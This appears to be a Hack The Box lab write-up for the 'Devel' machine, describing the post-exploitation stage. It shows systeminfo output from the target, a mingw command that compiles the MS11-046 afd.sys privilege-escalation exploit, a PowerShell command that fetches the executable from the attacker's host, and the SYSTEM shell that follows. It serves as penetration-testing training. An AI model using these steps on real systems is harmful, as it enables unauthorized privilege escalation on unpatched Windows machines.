Post Exploitation

c:\Users>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          23/11/2020, 1:43:00 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 682 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.497 MB
Virtual Memory: In Use:    550 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5

c:\Users>

Looking at the above commands the three things that stand out are:

  • OS Name: Microsoft Windows 7 Enterprise

  • System Type: X86-based PC

  • Hotfixes(s): N/A

Upon googling we find the follwing exploit

LogoMicrosoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)Exploit Database

We have to download in on our Kali machine and compile using the following: 

i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32

Transfer file to Windows machine and Execute

Set up HTTPServer and on the target machine type the following:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.34:5555/MS11-046.exe', 'c:\Users\Public\Downloads\MS11-046.exe')"
c:\Users\Public\Downloads>MS11-046.exe
MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>

PreviousExploitationNextLegacy (comeback to )

Last updated

Was this helpful?